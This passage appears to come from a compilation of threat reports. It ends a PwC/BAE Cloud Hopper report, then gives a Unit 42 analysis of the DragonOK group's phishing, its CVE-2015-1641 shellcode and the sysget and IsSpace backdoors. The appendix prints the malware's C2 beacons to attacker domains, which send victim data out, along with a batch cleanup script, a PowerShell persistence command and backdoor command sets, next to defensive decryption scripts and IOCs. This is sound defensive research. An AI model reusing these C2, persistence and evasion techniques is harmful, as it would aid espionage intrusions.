com/vinfo/us/threat-encyclopedia/web-attack/112/
pulling-the-plug-on-plugx, published 2012-08-04. Gives a
technical overview of PlugX and what it is used for.
Operation Cloud Hopper
About PwC
At PwC, our purpose is to build trust in society and solve important
problems. We
re a network of firms in 157 countries with more than
223,000 people who are committed to delivering quality in assurance,
advisory and tax services.
PwC UK
s cyber security team is a part of this mission, helping clients
around the world to assess, build and manage their cyber security
capabilities and to identify and respond to incidents through a range
of services including threat intelligence, threat detection and incident
response.
We are BAE Systems
At BAE Systems, we provide some of the world
s most advanced
technology defence, aerospace and security solutions.
At BAE Systems Applied Intelligence, we help nations,
governments and businesses around the world defend
themselves against cybercrime, reduce their risk in the
connected world, comply with regulation, and transform their
operations. We do this using our unique set of solutions,
systems, experience and processes
often collecting and
analysing huge volumes of data.
This publication has been prepared for general guidance on matters of interest only, and does not constitute professional advice. You should not act
upon the information contained in this publication without obtaining specific professional advice. No representation or warranty (express or implied) is
given as to the accuracy or completeness of the information contained in this publication, and, to the extent permitted by law, PricewaterhouseCoopers
LLP, its members, employees and agents do not accept or assume any liability, responsibility or duty of care for any consequences of you or anyone else
acting, or refraining to act, in reliance on the information contained in this publication or for any decision based on it.
2017 PricewaterhouseCoopers LLP. All rights reserved. In this document,
refers to the UK member firm, and may sometimes refer to the PwC
network. Each member firm is a separate legal entity. Please see www.pwc.com/structure for further details.
170328-155605-GC-UK
DragonOK Updates Toolset and Targets Multiple Geographic
Regions
researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/
By Josh Grunzweig
1/5/2017
The DragonOK group has been actively launching attacks for years. We first discussed them in April 2015 when we
witnessed them targeting a number of organizations in Japan. In recent months, Unit 42 has observed a number of
attacks that we attribute to this group. Multiple new variants of the previously discussed sysget malware family have
been observed in use by DragonOK. Sysget malware was delivered both directly via phishing emails, as well as in
Rich Text Format (RTF) documents exploiting the CVE-2015-1641 vulnerability (patched in MS15-033) that in turn
leveraged a very unique shellcode. Additionally, we have observed instances of the IsSpace and TidePool malware
families being delivered via the same techniques. While Japan is still the most heavily targeted geographic region by
this particular actor, we also observed instances where individuals or organizations in Taiwan, Tibet, and Russia also
may have been targeted.
Infiltration
We observed two unique techniques of infiltration for this particular campaign:
1. Phishing emails being sent with malicious executables directly attached
2. Malicious RTF files which exploit CVE-2015-1641.
The phishing emails had the following characteristics:
Email Subjects
Pickup at the Juanda Airport (1-Sep)
[Roughly Translated: Point gift announcement]
[Roughly Translated: 20th Anniversary Party]
[Roughly Translated: List of participants
10th anniversary alumni
association]
[Roughly Translated: Children
s investigation]
G20 report
[Roughly Translated: Anniversary reunion]
[Roughly Translated: Recent personnel change notice]
Attachment Filenames
G20 report.exe
List of Participants.exe
Registration form.exe
These emails targeted the following industries in Japan:
Manufacturing
1/23
Higher Education
Energy
Technology
Semiconductor
The malicious RTF files in question leverage a very specific shellcode to drop and execute the malicious payload,
as well as a decoy document. Decoy documents are legitimate benign documents that are opened after the
malicious payload is delivered, thus ensuring that the victim does not become suspicious because their expected
document opened as expected.
Two samples were found to include the decoy document show in Figure 1.
The title of the document roughly translates to
Ministry of Communications & Departments Authorities Empty Sites
and Hosted Public Works Source Clearance Photos
. The use of traditional Chinese indicators the target likely
residing in either Taiwan, Hong Kong, or Macau. However, based on the Taiwanese subject matter in this document,
we can safely come to the conclusion that the intended victim was of Taiwanese origin. These samples delivered an
updated version of the IsSpace malware family, which was discussed previously in a watering hole attack targeting
an aerospace firm. IsSpace is an evolved variant of the NFlog backdoor, which has been used by DragonOK in the
past.
2/23
Figure 1 Taiwanese decoy document
3/23
Two other samples were identified that used a Tibet-themed decoy document. The document in question (Figure 2)
appears to be an internal newsletter from the Central Tibetan Ministry, as suggested by the logo used as well as the
content of the document itself. This document indicates that the malware may have been targeted towards an
individual that is interested in Tibetan affairs. These particular samples were unique in that they delivered the
TidePool malware family that we reported on in May of 2016. We have not previously observed DragonOK using
TidePool in attacks.
Figure 2 Tibetan decoy document containing internal newsletter
We also identified an additional sample using decoy targeting Taiwanese victims (Figure 3), which deployed a newer
sysget sample.
4/23
Figure 3 Taiwanese-targeted decoy document
Other new samples associated with this group used a Russian language decoy document (Figure 4.) The decoy
document in question discusses the GOST block cipher, which was created by the Russian government in the
1970
s. The combination of Russian language and Russian-specific subject matter indicates that the intended victim
speaks Russian and may be interested in encryption. Like the previously discussed Tibetan decoy documents, these
samples also delivered the TidePool malware family.
5/23
6/23
Figure 4 Russian decoy document discussing the GOST block cipher
Finally, multiple samples used a traditional Chinese language decoy document that discussed a subsidy welfare
adjustment program. The use of traditional Chinese indicators the target likely residing in either Taiwan, Hong Kong,
or Macau. Similar to other attacks witnessed, a variant of the sysget malware family is installed by these files.
7/23
Figure 5 Decoy document discussing subsidy welfare adjustment program
Malware Deployed
In looking at the various malware samples used in attempted attacks, the following four families were identified:
Sysget version 2
Sysget version 3
TidePool
IsSpace
We broke the sysget classification into multiple variants when we found that a number of changes have been made
since our April 2015 report. Major distinctions between the versions of sysget include the following:
Sysget version 2
Removed support for persistence on Windows XP
Reworked the URIs used for network communication
Added additional layers of encryption for network communication and stored configuration files
Switched from RC4 to AES-128
Sysget version 3
Numerous anti-debug and anti-vm procedures added
Encrypted URIs in network communication with an initial static key
In addition, we observed a sysget version 4 that was discovered in another sample during our research. This
version is not attributed to a specific attack against an organization.
Indicators of compromise related to sysget version 4 and other samples not directly attributed to specific attacks
may be found in the Appendix of this blog post. Additionally, more information about the various sysget variants may
also be found in the Appendix.
The TidePool samples encountered are consistent with the samples previously discussed. I encourage readers to
view our previous blog post to learn more about the intricacies of this particular malware family.
The IsSpace malware sample, however, looks to have been updated since last we wrote on it. While the available
commands from the command and control (C2) server remains the same, the URI structure of the network
communication has been modified. Additionally, the installation routine for this malware family has been updated to
be far less complex than previous discussed versions, favoring PowerShell to set persistence and forgoing the
previously used side-loading technique. A more detailed analysis of the new instances of IsSpace may be found at
the end of this blog post in the Appendix.
Infrastructure
A number of unique domains were employed by the various Trojans used in these attacks. For the numerous
instances of sysget we observed, the following domains were observed for their C2:
kr44.78host[.]com
gtoimage[.]com
8/23
gogolekr[.]com
All of the above domains have Chinese WHOIS registrant details. Additionally, the gotoimage[.]com and
trend.gogolekr[.]com are both registered to the same registrant and resolve to the same netblock of
104.202.173.0/24.
The instances of TidePool identified communicated with the following C2 servers:
europe.wikaba[.]com
russiaboy.ssl443[.]org
cool.skywave[.]top
These domains did not have many definitive relations with the sysget C2 servers except for cool.skywave[.]top,
which shared a unique registrant email with the sysget C2 server of trend.gogolekr[.]com. Additionally, the
geographic region of the resolved IPs was consistent with the previous set, as they all resolved to various regions in
southeast Asia. Specifically, the domains resolved to China, Korea, and Taiwan in the past six months.
The IsSpace samples resolved to the following domains:
www.dppline[.]org
www.matrens[.]top
These domains had no apparent connections to the previously discussed C2 servers, other than the fact that they
resolved to Korea and Hong Kong respectively. Additionally, the registrar of
Jiangsu Bangning Science and
technology Co. Ltd.
was used for a large number of domains. A full graph of the relations between the various
attacks is shown in Figure 6.
Figure 6 Relationships between attacks
9/23
Conclusion
The DragonOK group are quite active and continue updating their tools and tactics. Their toolset is being actively
developed to make detection and analysis more difficult. Additionally, they appear to be using additional malware
toolsets such as TidePool. While Japan is still the most-targeted region by this group, they look to be seeking out
victims in other regions as well, such as Taiwan, Tibet, and Russia.
Palo Alto Network customers are protected against this threat in the following ways:
Malware families are tagged in AutoFocus via a variety of tags ( TidePool, NFlog, Sysget)
The following IPS signatures detect malicious network traffic:
IPS signature 14365 (IsSpace.Gen Command And Control Traffic)
IPS signature 14588 (Suspicious.Gen Command And Control Traffic)
IPS signature 13574 (NfLog.Gen Command And Control Traffic)
IPS signature 13359 (Nflog.Gen Command And Control Traffic)
All samples are appropriately marked malicious in WildFire
Appendix
CVE-2015-1641 Exploit and Shellcode
This particular group uses a very specific shellcode payload when exploiting CVE-2015-1641. This CVE is memory
corruption vulnerability which allows for arbitrary code execution in various versions of Microsoft Office, including
2007, 2010, and 2013.
The shellcode begins by dynamically loading a small number of API functions from kernel32. A number of hashes
are included that represent function names, which have a rotate right 7 (ROR7) operation applied against them
before being XORed against a key of
\x10\xAD\xBE\xEF
. The ROR7 operation is a very common technique in
shellcode to obfuscate what functions are being called. The author added the XOR operation to add another layer of
obfuscation.
Figure 7 API function hashes contained in shellcode
10/23
After the shellcode loads the necessary API functions, it proceeds to seek out a number of markers that will mark the
beginning and ending of both an embedded malicious payload, as well as a decoy document.
The malicious executable is marked with a starting point of 0xBABABABABABA and an end marker of
0xBBBBBBBB. The decoy document is found immediately after the end of the malicious payload, and has an end
marker of 0xBCBCBCBC. Both executables are encrypted with a 4-byte XOR key. Should the original data contain
0x00000000, it will not have the XOR applied against it.
The malicious payload is XORed against a key of 0xCAFEBEEF and the decoy document is XORed against
0xBAADF00D. The following script may be applied against the RTF document to extract both the malicious payload
and the decoy:
import sys, binascii
from itertools import cycle, izip
import re
def xor(message, key):
return ''.join(chr(ord(c)^ord(k)) for c,k in izip(message, cycle(key)))
def decrypt(data, key):
output = ""
iteration = 4
position = 0
while True:
window = data[position:position+iteration]
if window == "\x00\x00\x00\x00":
output += window
else:
output += xor(window, key)
position += iteration
if position == len(data) or position > len(data):
break
return output
def extract(data):
exe_data, doc_data = None, None
exe_starting_point = data.index("\xBA\xBA\xBA\xBA\xBA\xBA") + 6
exe_ending_point = None
ending_points = [m.start() for m in re.finditer("\xBB\xBB\xBB\xBB", data)]
for e in ending_points:
if e > exe_starting_point:
exe_ending_point = e
if exe_starting_point and exe_ending_point:
mz_data = data[exe_starting_point:exe_ending_point]
exe_data = decrypt(mz_data, "\xBE\xBA\xFE\xCA")
else:
raise Exception("Unable to find correct offsets for executable." )
doc_starting_point = exe_ending_point + 4
doc_ending_point = None
ending_points = [m.start() for m in re.finditer("\xBC\xBC\xBC\xBC", data)]
for e in ending_points:
if e > doc_starting_point:
doc_ending_point = e
if doc_starting_point and doc_ending_point:
11/23
doc = data[doc_starting_point:doc_ending_point]
doc_data = decrypt(doc, "\x0D\xF0\xAD\xBA")
else:
raise Exception("Unable to find correct offsets for document.")
return [exe_data, doc_data]
def main():
input_file = sys.argv[1]
input_fh = open(input_file, 'rb')
input_data = input_fh.read()
input_fh.close()
exe, doc = extract(input_data)
filename = "{}.exe".format(input_file)
output_file = open(filename, 'wb')
output_file.write(exe)
output_file.close()
print "[+] Wrote {}".format(filename)
filename = "{}.doc".format(input_file)
output_file = open(filename, 'wb')
output_file.write(doc)
output_file.close()
print "[+] Wrote {}".format(filename)
if len(sys.argv) == 2 and __name__ == "__main__":
main()
When both files are decrypted, they are written to the following location in the %TEMP% directory:
../..exe
../..doc
Note the initial
, which represents the parent directory of %TEMP%. This coupled with the unusual names of ..exe
and ..doc make this particular shellcode very unique, which is one way we have attributed these samples to the
same group. After the samples have been written, they are executed via calls to WinExec.
Sysget v2 Analysis
One of the fundamental changes witnessed in the second iteration of sysget is removing support for Windows XP
and lower. Other changes include modifications to the URIs used for network communication.
Like the original version of sysget, sysget v2 still uses a named event of
mcsong[]
to ensure a single instance is
running at a time. It proceeds to make attempts at copying itself to the %STARTUP%/notilv.exe path. However, it
uses COM objects to perform this action that is not available in Windows XP, which prevents the malware from
installing itself to this location. While the remainder of the malware operates as expected, it will not survive a restart
of the system.
Sysget proceeds to make an attempt at reading the following configuration file. This filename and path has changed
since the original version, and is consistent in the subsequent versions.
%APPDATA%/vklCen5.tmp
This configuration file holds both a unique victim identifier, as well as a key that is used to encrypt HTTP traffic. It is
12/23
encrypted using the AES-128 encryption algorithm, using a static key of
734thfg9ih
. Using AES-128 is a change
from the previous version, where RC4 was used for all encryption operations. The following Python code may be
used to decrypt this file:
import sys
import base64
from wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey, CryptDecrypt
def decrypt(data, original_key):
CALG_AES_128 = 0x660E
CALG_MD5 = 0x8003
md5_hasher = CryptCreateHash(CALG_MD5)
CryptHashData(md5_hasher, original_key)
key = CryptDeriveKey(md5_hasher, CALG_AES_128)
decrypted_data = CryptDecrypt(key, data)
return decrypted_data
arg = open(sys.argv[1], 'rb').read()
print repr(decrypt(arg, '734thfg9ih'))
When executed against an example configuration file, we see the following output, which includes the two pieces of
data noted previously:
C:\>python decrypt_config.py vklCen5.tmp
'gh1443717133\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
x00\x00\x00\x00\x001059086204\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
The encryption of this configuration file is a new feature that was not present in the original version of sysget.
If this file is not present on the system, the malware will attempt to retrieve the necessary information via a HTTP
request. The following request is made to the remote command and control server. Note that the full URI is statically
set by the malware sample.
GET /index.php?type=read&id=1420efbd80ce02328663631c8d8f813c&pageinfo=jp&lang=
utf-8 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/40.0.2214.115 Safari/537.36
Host: hello.newtaiwan[.]top
The server responds with the following data, encrypted using the same technique previously described with a static
key of
aliado75496
. Once decrypted, we see the following example data being sent back to sysget:
gh1443717133\n1059086204\n
The first string is used as a key for all subsequent network communication. The second string is treated as a unique
victim identifier. This data is encrypted using the key of
734thfg9ih
and written to the %APPDATA%/vklCen5.tmp
file.
After this information has been obtained, the malware proceeds to enter its command and control loop. An HTTP
request such as the following is made to the remote server. Note that the
GET variable holds the MD5 hash of
the previously obtained victim identifier. The remaining data in the URI is hardcoded.
13/23
GET /index.php?type=get&pageinfo=bridge03443&lang=jp&mid=5717cb8fed2750a2ee9e8
30a30716ed4 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/40.0.2214.115 Safari/537.36
Host: hello.newtaiwan[.]top
The response is encrypted using the unique key that was obtained previously. Should the response contain
Fatal
error
unencrypted, no further actions are taken by the malware sample. Once decrypted, the response may have
one of the following two choices, and their accompanying purpose. Alternatively, if a raw command is provided, the
malware will execute it and return the results.
Command
Description
goto wrong
[file_path]
Read a specific file and return its contents.
goto right
[filename]
[identifier]
Write a given file. The identifier is used to retrieve the file
s contents in a
subsequent HTTP request.
When the
goto wrong
request is made, a HTTP POST request is made to the following URI. In the following URI,
the
list
parameter contains the MD5 hash of the victim
s identifier.
/index.php?type=register&pageinfo=myid32987&list=5717cb8fed2750a2ee9e830a3
0716ed4
The contents of this POST request contains the victim
s identifier, as well as the file
s contents encrypted with the
unique key. The first 50 bytes are reserved for the victim identifier, as shown below:
0000016F 35 37 31 37 63 62 38 66 65 64 32 37 35 30 61 32 5717cb8f ed2750a2
0000017F 65 65 39 65 38 33 30 61 33 30 37 31 36 65 64 34 ee9e830a 30716ed4
0000018F 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
0000019F 00 00 4b 59 bc 53 53 99 2b 6f a7 b5 5a 85 c7 66 ..KY.SS. +o..Z..f
Once decrypted, the data contains both the filename, as well as the contents of that file.
test.txt\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00[TRUNCATED]\x
00\x00\x00file contents
If the
goto right
command is used, the malware will make a subsequent request to the following URI. The
cache
variable holds the unique identifier that was provided in the
goto right
command.
/index.php?type=goto&pageinfo=myid47386&cache=identifier
Once the file contents are obtained, they are written to the specified filename in the %STARTUP% folder.
When a raw command is received, the malware will upload the results to the following URI via a POST request:
/index.php?type=register
An overview of the network communications exhibited by sysget version 2 can be seen in the figure below.
14/23
15/23
Figure 8 Sysget version 2 command and control flow
Sysget v3 Analysis
Some of the biggest changes witnessed in version 3 of sysget includes numerous anti-debug and anti-vm detections
added, as well as the encryption of the URIs used for network communication.
When the malware initially executes, it performs the following checks to ensure it is not being debugged and not
running in a sandbox or virtualized environment.
Should these checks return false, the malware proceeds to enter its installation routine. The malware originally
copies itself to a temp file in the %TEMP% directory with a filename prefix of
. It proceeds to append 4194304
bytes of randomly chosen data to the end of this file. The increased filesize may have been added by the author in
an attempt to thwart sandboxes that impose filesize limits on what is saved and/or processed. Finally, the malware
copies the original file from the tmp path to the %STARTUP%/winlogon.exe path using the same technique
witnessed in version 2. Sysget then writes a batch script in the %TEMP% folder with the following contents, cleaning
up the original files and spawning the newly written winlogon.exe executable:
@echo off
timeout 1
for /f %%i in ('tasklist /FI "IMAGENAME eq [original_executable_name]" ^| find /v /c ""' ) do set YO=%%i
if %%YO%%==4 goto :t
del /F "[original_executable_path]"
del /F "[tmp_file]"
start /B cmd /c "[startup_winlogon.exe]"
del /F "[self]"
exit
After installation, sysget will attempt to read the same %APPDATA%/vklCen5.tmp file as witnessed in the previous
variant. A number of strings within the malware, including the
734thfg9ih
key used to encrypt this file, have been
obfuscated via a single-byte XOR of 0x5F.
Similar to previous versions, should this vklCen5.tmp file not be present on the victim machine, it will make an
external HTTP request to retrieve the necessary information. The following request is made by the malware.
Readers will notice that the URI has changed from previous versions in a number of ways. This version of sysget
looks to always make requests to 1.php, which is hardcoded within the malware itself. Additionally, all HTTP URIs in
this version of sysget are encrypted. The initial GET request made to retrieve the victim identifier and unique key is
encrypted with a key of
Cra%hello-12sW
. The subsequent response containing this information is then decrypted
using a key of
aliado75496
, which is consistent with previous versions.
16/23
/1.php?K+50lkzq7OtigRtWY7Z5DwkmxRhFd5n3UXyH+Flfa0S8f5h3nl6XBDMa6a3IbDiPQqW
SwZh7lQRmIPLlC8Wmfr8cGv7raGEV160r73FJjnOfyJPLEKWAIyJnfPZhHdGapA6tfwfwj24TN
4QbBrMJkVCLPPZoI4HNtdDEo6G3ujjyvkpWnGQnRBi6DzylNrMypV/K6Ft32dsMmmO52q4IdQ==
HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/40.0.2214.115 Safari/537.36
Host: gtoimage.com
When the URI above is base64-decoded and subsequently decrypted, we see the following:
index.php?type=read&id=692fdc3c7b2c310fc017e4af335b8dc8&pageinfo=jp&lang=utf-8
This URI is consistent with the previous sysget variant. It would seem the authors simply have added this layer of
encryption to hinder efforts to block the malware via network-based detections.
After this initial request to retrieve the victim identifier and unique key, sysget enters its command and control loop.
This process is consistent with the previous version, but simply has the extra layer of encryption used for the URIs.
Sysget v4 Analysis
The fourth variant of sysget is nearly identical to the third variant. However, the main difference lies in the URIs used
for network communication. In addition to the expected encryption of the URIs, this variant also mangles the base64
encoding that is performed afterwards. The following Python script may be used to de-obfuscate the base64 URI
found in this variant:
17/23
import base64
URI Request:
/5.php?62H72xihwn4LqfdOqTV4W2AthjuOeCa2k0RUvE7CicXxN2MWFre2pqH8gIdMMJQbzS0
AMo+rT4GGalhcebmCbjdrjZlyDhmUjE7QO5mIXZTAucGt3LeLXxOxGiV1G4zecHSPAX3AiAeR+
BGFsc3wtMhOWzXfithXYeCKnjh1O7pXsYqyKqfl=HpVzs4YXZb=UQY=BNEnr/77jW5JTLNI4aed
99 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/40.0.2214.115 Safari/537.36
Host: www.sanseitime.com
uri_string =
"62H72xihwn4LqfdOqTV4W2AthjuOeCa2k0RUvE7CicXxN2MWFre2pqH8gIdMMJQbzS0AMo+rT
4GGalhcebmCbjdrjZlyDhmUjE7QO5mIXZTAucGt3LeLXxOxGiV1G4zecHSPAX3AiAeR+BGFsc3
wtMhOWzXfithXYeCKnjh1O7pXsYqyKqfl=HpVzs4YXZb=UQY=BNEnr/77jW5JTLNI4aed99"
b64_string =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
prefix_int = int(uri_string[0:2])
out = ""
for u in uri_string[2:]:
ind = b64_string.index(u) - prefix_int
out += b64_string[ind]
decoded = base64.b64decode(out)
Additionally, the C2 URI changes in this variant, from 1.php to 5.php
IsSpace Analysis
When initially run, IsSpace will create a unique event to ensure a single instance of the malware is running at a
given time. This event name appears to be unique per the sample, as multiple samples contained unique event
names. The following event names have been observed in the samples that were analyzed:
e6al69MS5iP
v485ILa3q5z
IsSpace proceeds to iterate over the running processes on the system, seeking out the following two process
substrings:
uiSeAgnt
avp.exe
The uiSeAgnt string may be related to Trend Micro
s solutions, while avp.exe most likely is related to Kaspersky
anti-malware product.
In the event uiSeAgnt is identified, the malware will enter its installation routine if not already running as
bfsuc.exe
and proceeds to exit afterwards. Should avp.exe be identified, the malware enters an infinite sleep loop until a
mouse click occurs. After this takes place, the malware proceeds as normal.
18/23
The malware then determines if it is running under Windows XP. In the event that it is, it will make a HTTP GET
request to www.bing.com, presumably to ensure network connectivity.
Figure 9 IsSpace connecting to www.bing.com
If the malware is not running on Windows XP, it will attempt to obtain and decrypt any basic authentication
credentials from Internet Explorer. This information is used in subsequent HTTP requests in the event a 407 (Proxy
Authentication Required) or 401 (Unauthorized) response code is received during network communication.
IsSpace will then enter its installation routine, where it will first copy itself to the %LOCALAPPDATA% folder with a
name of
bfsuc.exe
. It then sets the proper registry key for persistence by executing the following PowerShell
command:
C:\Windows\system32\cmd.exe /C Powershell.exe New-ItemProperty -Path
HKCU:SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run -Name Identity PropertyType String -Value c:\users\josh grunzweig\appdata\local\bfsuc.exe
-force
The malware then makes an initial HTTP POST request to the configured C2 server. It will make this request to the
/news/Senmsip.asp
URI. The POST data is XORed against a key of
\x35\x8E\x9D\x7A
, which is consistent with
previous versions of IsSpace and NFlog. Decrypted, the POST data reads
01234567890
. The C2 server in turn
will respond with the victim
s external IP address.
Figure 10 Initial IsSpace beacon
IsSpace then spawns two threads that will make HTTP requests to the following URIs:
/news/Sennw.asp?rsv_info=[MAC_ADDRESS]
/news/Sentire.asp?rsv_info=[MAC_ADDRESS]
The
Sennw.asp
POST requests that are made contain collected victim information. They, like other information sent
across the network, are encrypted using the previously mentioned 4-byte XOR key. When decrypted, we are
provided with information such as the following:
19/23
60-F8-1D-CC-2F-CF#%#172.16.95.1#%#172.16.95.186#%#WINLJLV2NKIOKP#%#Win7#%#English(US)#%#2016-12-20
16:27:12#%#Active#%#xp20160628#%#IsAdmins#%#False
The information, delimited via
, is as follows:
Value
Description
60-F8-1D-CC-2F-CF
MAC address
172.16.95.1
External IP collected previously
172.16.95.186
Internal IP address
WIN-LJLV2NKIOKP
Hostname
Win7
Windows version
English(US)
Language
2016-12-20 16:27:12
Timestamp
Active
Malware status. May also be
Sleep
xp20160628
Potential campaign identifier
IsAdmins / False
User admin status
The malware is expected to return one of the following two responses to this HTTP request:
Active
Slient (Note the typo)
In the event the response of Slient is received, the malware will stop sending out HTTP requests to the
Sentire.asp
URI. Conversely, if the malware is set to the
Sleep
status and the
Active
response is received, it will begin the
Sentire.asp
requests once more.
The requests to
Sentire.asp
act as the main C2 loop, requesting commands from the remote server. The
commands are consistent with previously observed instances of IsSpace, however, the URIs have been modified.
Command
Description
Response URI
Executes command
Sentrl.asp
Browse
List specified directory
Senjb.asp
UploadFile
Upload file
Sensp.asp
DownLoad
Download file
Senwhr.asp
20/23
DelFile
Delete file
DragonOK Indicators
Malicious RTF Documents
020f5692b9989080b328833260e31df7aa4d58c138384262b9d7fb6d221e3673
0d389a7b7dbdfdffcc9b503d0eaf3699f94d7a3135e46c65a4fa0f79ea263b40
52985c6369571793bc547fc9443a96166e372d0960267df298221cd841b69545
785398fedd12935e0ae5ac9c1d188f4868b2dc19fb4c2a13dab0887b8b3e220d
941bcf18f7e841ea35778c971fc968317bee09f93ed314ce40815356a303a3ec
ba6f3581c5bcdbe7f23de2d8034aaf2f6dc0e67ff2cfe6e53cfb4d2007547b30
df9f33892e476458c74a571a9541aebe8f8d18b16278f594a6723f813a147552
925880cc833228999ea06bd37dd2073784ab234ea00c5c4d55f130fe43a0940b
3e4937d06ac86078f96f07117861c734a5fdb5ea307fe7e19ef6458f91c14264
16204cec5731f64be03ea766b75b8997aad14d4eb61b7248aa35fa6b1873398b
64f22de7a1e2726a2c649de133fad2c6ad089236db1006ce3d247c39ee40f578
c3b5503a0a89fd2eae9a77ff92eef69f08d68b963140b0a31721bb4960545e07
d227cf53b29bf0a286e9c4a1e84a7d70b63a3c0ea81a6483fdfabd8fbccd5206
9190b1d3383c68bd0153c926e0ff3716b714eac81f6d125254054b277e3451fe
d321c8005be96a13affeb997b881eaba3e70167a7f0aa5d68eeb4d84520cca02
d38de4250761cb877dfec40344c1642542ca41331af50fa914a9597f8cc0ee9b
5a94e5736ead7ea46dbc95f11a3ca10ae86c8ae381d813975d71feddf14fc07a
bbdc9f02e7844817def006b9bdef1698412efb6e66346454307681134046e595
IsSpace
12d88fbd4960b7caf8d1a4b96868138e67db40d8642a4c21c0279066aae2f429
1a6e3cd2394814a72cdf8db55bc3f781f7e1335b31f77bffc1336f0d11cf23d1
C2 Domains
www.dppline[.]org
www.matrens[.]top
C2 Domains
europe.wikaba[.]com
russiaboy.ssl443[.]org
cool.skywave[.]top
Sysget Version 2
82f028e147471e6f8c8d283dbfaba3f5629eda458d818e1a4ddb8c9337fc0118
C2 Domains
newtw2016.kr44.78host[.]com
Sysget Version 3
02fc713c1b2c607dff4fc6c4797b39e42ee576578f6af97295495b9b172158b9
a0b0a49da119d971fa3cf2f5647ccc9fe7e1ff989ac31dfb4543f0cb269ed105
21/23
b49cb2c51bc2cc5e48585b9b0f7dd7ff2599a086a4219708b102890ab3f4daf3
b8f9c1766ccd4557383b6643b060c15545e5f657d87d82310ed1989679dcfac4
d75433833a3a4453fe35aaf57d8699d90d9c4a933a8457f8cc37c86859f62d1e
685076708ace9fda65845e4cbb673fdd6f11488bf0f6fd5216a18d9eaaea1bbc
7fcc86ebca81deab264418f7ae5017a6f79967ccebe8bc866efa14920e4fd909
c5c3e8caffd1d416c1fd8947e60662d82638a3508dbcf95a6c9a2571263bdcef
C2 Domains
gtoimage[.]com
trend.gogolekr[.]com
Additional Indicators
Sysget Version 2
a768d63f8127a8f87ff7fa8a7e4ca1f7e7a88649fe268cf1bd306be9d8069564
2bf737f147e761586df1c421584dba350fd865cb14113eee084f9d673a61ee67
2c7c9fd09a0a783badfb42a491ccec159207ee7f65444088ba8e7c8e617ab5a5
d91439c8faa0c42162ea9a6d3c282d0e76641a31f5f2fbc58315df9c0b90059c
89d8d52c09dc09aeb41b1e9fafeacf1c038912d8c6b75ad4ef556707b15641ff
6c1d56cb16f6342e01f4ebfc063db2244aef16d0a248332348dcdb31244d32f2
9c66232061fbb08088a3b680b4d0bffbbce1ce01d0ce5f0c4d8bf17f42d45682
b138ea2e9b78568ebd9d71c1eb0e31f9cf8bc41cd5919f6522ef498ffcc8762a
8830400c6a6d956309ac9bcbcceee2d27ba8c89f9d89f4484aba7d5680791459
bda66f13202cef8cfb23f36ac0aee5c23f82930e1f38e81ba807f5c4e46128e3
e8197e711018afd25a32dc364a9155c7e2a0c98b3924dc5f67b8cd2df16406ff
e9c0838e2433a86bc2dec56378bd59627d6332ffb1aec252f5117938d00d9f74
c63685b2497e384885e4b4649428d665692e8e6981dad688e8543110174f853b
2c9c2bfea64dd95495703fcec59ad4cf74c43056b40ed96d40db9b919cfd050b
94850525ea9467ae772c657c3b8c72663eaa28b2c995b22a12b09e4cacecad6d
e8bd20e3d8491497ca2d6878b41fb7be67abb97ee272ef8b6735faa6acd67777
C2 Domains
hello.newtaiwan[.]top
bullskingdom[.]com
mail.googleusa[.]top
www.modelinfos[.]com
modelinfos[.]com
www.sanspozone[.]com
Sysget Version 3
f9a1607cdcfd83555d2b3f4f539d3dc301d307e462a999484d7adb1f1eb9edf6
7f286fbc39746aa8feeefc88006bedd83a3176d2235e381354c3ea24fe33d21c
3b554ef43d9f3e70ead605ed38b5e66c0b8c0b9fc8df16997defa8e52824a2a6
8d7406f4d5759574416b8e443dd9d9cd6e24b5e39b1f5bc679e4a1ad54d409c6
edf32cb7aad7ae6f545f7d9f11e14a8899ab0ac51b224ed36cfc0d367daf5785
db19b9062063302d938bae51fe332f49134dc2e1947d980c82e778e9d7ca0616
cde217acb6cfe20948b37b16769164c5f384452e802759eaabcfa1946ea9e18b
9bee4f8674ee067159675f66ca8d940282b55fd1f71b8bc2aa32795fd55cd17e
22/23
39539eb972de4e5fe525b3226f679c94476dfc88b2032c70e5d7b66058619075
c45145ca9af7f21fff95c52726ff82595c9845b8e9d0dbf93ffe98b7a6fa8ee9
55325e9fccbdada83279e915e5aeb60d7b117f154fa2c3a38ec686d2552b1ebc
2c7d29da1b5468b49a4aef31eee6757dc5c3627bf2fbfb8e01dec12aed34736a
16dc75cf16d582eac6cbbe67b048a31fffa2fb525a76c5794dad7d751793c410
91eee738f99174461b9a4085ea70ddafc0997790e7e5d6d07704dcbbc72dc8bf
4a702ffbf01913cc3981d9802c075160dfd1beed3ba0681153d17623f781f53f
e8bed52c58759e715d2a00bdb8a69e7e93def8d4f83d95986da21a549f4d51c5
ed5598716de2129915f427065f0a22f425f4087584e1fa176c6de6ad141889d1
adc86af1c03081482fe9ba9d8a8ae875d7217433164d54e40603e422451a2b90
f0540148768247ed001f3894cdfa52d8e40b17d38df0f97e040a49baa3f5c92e
ce38a6e4f15b9986474c5d7c8a6e8b0826330f0135e1da087aae9eab60ea667a
5c4e98922e6981cf2a801674d7e79a573ebcdc9ebc875ef929511f585b9c4781
4880b43ddc8466d910b7b49b6779970c38ce095983cad110fa924b41f249f898
76b6f0359a3380943fece13033b79dc586706b8348a270ac71b589a5fd5790a4
